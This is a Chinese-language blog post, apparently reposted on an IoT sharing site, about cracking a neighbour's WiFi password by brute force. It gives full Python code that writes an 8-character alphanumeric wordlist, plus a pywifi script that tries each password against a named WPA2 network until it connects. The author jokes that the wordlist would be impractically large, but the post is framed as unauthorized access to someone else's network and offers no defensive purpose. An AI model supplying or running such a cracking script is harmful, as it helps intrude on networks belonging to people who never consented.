使用Python技术破解邻居家WiFi密码

文章目录

  • 1,破解思路
  • 1.1,假定邻居家的WiFi密码长度是8位,且仅由0-9这10个数字,a-z这26个小写字母,A-Z这26个大写字母组成
  • 1.2, 用python程序对0-9,a-z,A-Z这62个元素进行排列组合。
  • 1.3,将这218万亿个组合依次按行写入到密码本.txt中
  • 1.4,编写python 的WiFi密码配对程序,从密码本.txt依次读取,尝试和隔壁邻居WiFi进行验证连接,直至成功
  • 1.5,密码本的大小
  • 2,生成密码本的python程序(版本是Python 3.8.10)
  • 3,wifi连接程序
  • 4,先运行 第2步,在D:\codes生成一份 pwd.txt 密码本文件,然后再执行第3步,等待N分钟,就可以连接成功!
  • 1,破解思路

    1.1,假定邻居家的WiFi密码长度是8位,且仅由0-9这10个数字,a-z这26个小写字母,A-Z这26个大写字母组成

    1.2, 用python程序对0-9,a-z,A-Z这62个元素进行排列组合。

    高中数学都学过排列组合吧?
    从0-9,a-z,A-Z这62个元素中每次挑8个元素出来,但同一元素可以重复取出,排成一列,请问有多少种组合方式?
    答案是62的8次方个,也就是218,340,105,584,896个,大概是218万亿个。

    1.3,将这218万亿个组合依次按行写入到密码本.txt中

    1.4,编写python 的WiFi密码配对程序,从密码本.txt依次读取,尝试和隔壁邻居WiFi进行验证连接,直至成功

    同样的道理,如果邻居WiFi密码长度是9位,且还多了特殊符号~!@#¥这些,那么构建密码本的时候也要考虑进去。

    1.5,密码本的大小

    通常情况下,一个字母占用 1 字节,一共大概有218万亿个长度为8的字符串被写进 密码本.txt中去,那么这个密码本.txt大概有1744万亿字节,相当于1578143.95TB!!
    宝子们,先看看你的电脑空间有没有1T。

    2,生成密码本的python程序(版本是Python 3.8.10)

    import time
    start_time = time.time()
    import string
    import itertools
    nums = 0
    all_characters = string.ascii_letters + string.digits
    dic =open(r"D:\\codes\\pwd.txt",'a')
    for combination in itertools.product(all_characters, repeat=8):
        nums  = nums +1
        dic.write(''.join(combination))
        dic.write(''.join('\n'))
        print (nums)
        if nums == 20:
            break
    dic.close()
    end_time = time.time()    
    execution_time = end_time - start_time
    print("程序运行时间:", execution_time, "秒")
    

    3,wifi连接程序

    # coding:utf-8
    import pywifi
    from pywifi import const
    import time
    import datetime
    
    #测试连接,返回链接结果
    def wifiConnect(pwd):
        #抓取网卡接口
        wifi=pywifi.PyWiFi()
        #获取第一个无线网卡
        ifaces=wifi.interfaces()[0]
        #断开所有连接
        ifaces.disconnect()
        time.sleep(1)
        wifistatus=ifaces.status()
        if wifistatus ==const.IFACE_DISCONNECTED:
            #创建WiFi连接文件
            profile=pywifi.Profile()
            #要连接WiFi的名称
            profile.ssid="TP-LINK_1301"
            
            #网卡的开放状态
            profile.auth=const.AUTH_ALG_OPEN
            #wifi加密算法,一般wifi加密算法为wps
            profile.akm.append(const.AKM_TYPE_WPA2PSK)
            #加密单元
            profile.cipher=const.CIPHER_TYPE_CCMP
            #调用密码
            profile.key=pwd
            #删除所有连接过的wifi文件
            ifaces.remove_all_network_profiles()
            #设定新的连接文件
            tep_profile=ifaces.add_network_profile(profile)
            ifaces.connect(tep_profile)
            #wifi连接时间
            time.sleep(1)
            if ifaces.status()==const.IFACE_CONNECTED:
                return True
            else:
                return False
        else:
            print("已有wifi连接") 
     
    #读取密码本
    def readPassword():
        print("开始破解:")
        #密码本路径
        path="D:\\codes\\pwd.txt"
    #打开文件
        file=open(path,"r")
        while True:
            try:
                #一行一行读取
                pad=file.readline()
                bool=wifiConnect(pad)
                if bool:
                    print("密码已破解: ",pad)
                    print("WiFi已自动连接!!!")
                    break
                #else:
                    #跳出当前循环,进行下一次循环
                    #print("密码破解中....密码校对: ",pad)
            except:
                continue
     
    start=datetime.datetime.now() 
    readPassword()
    end=datetime.datetime.now()
    

    4,先运行 第2步,在D:\codes生成一份 pwd.txt 密码本文件,然后再执行第3步,等待N分钟,就可以连接成功!

  • 强烈建议大家好好看看步骤1.5,不要盲目尝试啊,哈哈
  • 作者:年薪丰厚

    物联沃分享整理
    物联沃-IOTWORD物联网 » 使用Python技术破解邻居家WiFi密码

    发表回复